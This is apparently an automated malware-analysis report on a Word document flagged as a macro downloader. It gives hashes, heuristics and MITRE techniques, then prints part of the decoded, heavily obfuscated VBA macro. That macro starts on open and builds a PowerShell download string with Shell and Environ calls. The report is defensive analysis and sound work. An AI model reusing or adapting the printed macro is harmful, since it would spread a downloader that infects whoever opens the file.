Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 292a31ab6f6f5186…

MALICIOUS

Office (OLE)

Size: 245.0 KB
Created: 2018-09-03 16:18:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 4d2c2ecaaa6d63d21fee770f27679568
SHA-1: 9d8753680d2c5a6013f36ae4e1a736c6e9e48593
SHA-256: 292a31ab6f6f518698413850d403c5144e6164a77190e6a6fb9a41f8a017f330
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for running code automatically as soon as the document is opened. The macro uses Shell() and CreateObject() calls, which indicates an attempt to download and execute a secondary payload. The ClamAV detection corroborates this assessment, identifying the file as Doc.Downloader.Valyria-6704836-0.

Heuristics (8)

  • ClamAV: Doc.Downloader.Valyria-6704836-0 (severity: critical; tag: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6704836-0
  • VBA macros detected (severity: medium; tag: OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; tag: OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (severity: high; tag: OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (severity: high; tag: OLE_VBA_CREATEOBJ)
    CreateObject call
  • Environ() call (env variable access) (severity: low; tag: OLE_VBA_ENVIRON)
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker (severity: medium; tag: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; tag: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 238491 bytes
SHA-256: f30930ec802ec58b3363ed48d4d2d91a775809a02d9c66e8b4cf94b6c094dd3b

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
auriu = NaN
Select Case 51 - 78
Case -27
tcewjcc_fdnp = "$a"
End Select
gxe_o_auj = NaN
If 1375 < 798 Then
dixxfikq = NaN
ayzygzryi = NaN
utjvrzrhqi = NaN
iybqfuxtq = NaN
ElseIf 8833 > 8051 Then
ptaz0 = "dhm_axfyloelztlaiempmxbb"
tcewjcc_fdnp = tcewjcc_fdnp + ptaz0
Else
Dim xt_ndauoqtre, aalvnmabx, rjufnhd60, azwuvqqai27
xt_ndauoqtre = NaN
tuoimlaug = NaN
End If
Dim hithweou
hithweou = NaN
Select Case "bxuohoe"
Case "bxuohoe"
iiexzbcia = tcewjcc_fdnp
lhayaagie = NaN
dproi_a_w = "vehkzfnozee6='11.11';$ubxyd"
Dim jyuotweihl
jyuotweihl = NaN
iiexzbcia = iiexzbcia + dproi_a_w
End Select
nttsk = NaN
If 41 * 55 = 2255 Then
iiexzbcia = iiexzbcia + "iayqcot"
End If
axtyutic15 = NaN
If 2314 > -1982 Then
iwqyapp = wdsowfgq + iiexzbcia + gugqbgy
keapxpb = NaN
ai_yinr = "bktderetvoqalfogptpfueco='oce"
iwqyapp = iwqyapp + ai_yinr
Else
End If
ickyao = NaN
If 7842 <= 9458 Then
iwqyapp = iwqyapp + "ss ';$rbrukyy_ubnioghfte_"
ElseIf 66 * 71 = 1246 Then
Dim nlxulmsgo11
nlxulmsgo11 = NaN
anwgxf = NaN
yhcuyoeqh = NaN
Else
Shell aiwxnek, 0
End If
mtcpdqkrqeb = NaN
If 2654 > 179 Then
uyu_izyfw = "kywbo=' = G';$ue_kkgndu"
iwqyapp = iwqyapp + uyu_izyfw
End If
vaoethkqc = NaN
Select Case "oiusol"
Case "oiusol"
iwqyapp = iwqyapp + "dl_gktdnnvrnaefqk"
End Select
cfcevmozlu = NaN
If 8799 < 11761 Then
hoyo_ourn = "ytruwkbg='uif';"
iwqyapp = iwqyapp + hoyo_ourn + eia_cf
ElseIf 40 + 74 = -34 Then
Else
End If
dqrp = NaN
Select Case 30 + 24
Case 54
px_i_ejio = "$uiyoueuicut62='ocess';$uelefshnowywgiue_bsbjwu"
mzdnyywlh = NaN
iyyke2 = NaN
iwqyapp = iwqyapp + px_i_ejio
End Select
bfoqcxjonxi = NaN
Select Case 85 - 75
Case 16046
yseddyath = NaN
Case 12145
knyioyaurm = NaN
Case 10
sbxrpulaia7 = isii + iwqyapp + ukco_rb
eyeeo = NaN
yird = "oukrfn='ma"
Dim fdkxotjcxx, sqaqya As String
fdkxotjcxx = NaN
sbxrpulaia7 = sbxrpulaia7 + yird
End Select
vyiurtlv = NaN
Select Case "aoxnfeogca"
Case "aoxnfeogca"
sbxrpulaia7 = sbxrpulaia7 + "t ';$euwahmhprgzeyymsnnsiyooi_aoikb_oic"
End Select
orayonwocb = NaN
Select Case 81 + 13
Case izo_vqf55
aljcyp2 = NaN
Case 94
yufu = sbxrpulaia7 + paijh
mvvvpv = NaN
yufu = yufu + "bs_qd='$path';$i"
End Select
azktolbhr = NaN
Select Case 31 * 51
Case 1581
xklygsiwaw = "iauajvlmtrlieio='%s; $e"
iuxottm = NaN
yufu = yufu + xklygsiwaw + uaybshoeu3
End Select
ooada = NaN
If 7827 <= 11160 Then
txstgaeqt = Environ("SystemRoot")
End If
ie_dwz = NaN
Select Case 79 * 62
Case 4898
ouohduouu = yufu
crjhxhbfx = NaN
Dim hpwdtd_fby_bz6
hpwdtd_fby_bz6 = NaN
Dim ohhyaoe
ohhyaoe = NaN
yaiaiuy = "_';$lkzugewzanzluauo"
vfyzigv = NaN
ouohduouu = ouohduouu + yaiaiuy
Case jbe_ioa_ei
Dim hdtwzlill As String
hdtwzlill = NaN
Case eeai
uyxzuy = NaN
End Select
pvthfg = NaN
aqkha_aqz = NaN
yuaifj0 = NaN
If 84 + 98 = -14 Then
oy_li = NaN
ewbguxp = NaN
Else
knghuwc_bs = "rou='$pa';$ugce_zadbwyyxwxe"
ouohduouu = wufbtvcie + ouohduouu + knghuwc_bs
End If
vkcewsyaqa8 = NaN
Select Case 86 - 42
Case 44
ouohduouu = ouohduouu + "ieeii='"
Case 157
ybvylxxieo5 = NaN
Case 271
oi_au = NaN
End Select
iyfok9 = NaN
If 41 > -1690 Then
ouohduouu = ouohduouu + "env:';$iuxxxsttyoeq"
Else
yuhono = NaN
Dim etldv
etldv = NaN
End If
eplqiftn_uy = NaN
Select Case 79 * 48
Case iibpjmdqj_p
Dim tatdoxybrt2
tatdoxybrt2 = NaN
Case 3792
fhymcllnubh = "_lier_lmiomvsuqgoh='Ne"
k_uktoc = NaN
ouohduouu = ouohduouu + fhymcllnubh
Case 18894
yfoosmjy_u = NaN
End Select
oow_im42 = NaN
If 71 - 19 = 52 Then
ouohduouu = ouohduouu + "t.W';$ietuoy_o"
ElseIf 3903 < 1275 Then
Dim pdhdyvbevn As String
pdhdyvbevn = NaN
Dim kokljjj As String
kokljjj = NaN
iombszvalq = NaN
Else
End If
iavvwkee66 = 
... (truncated)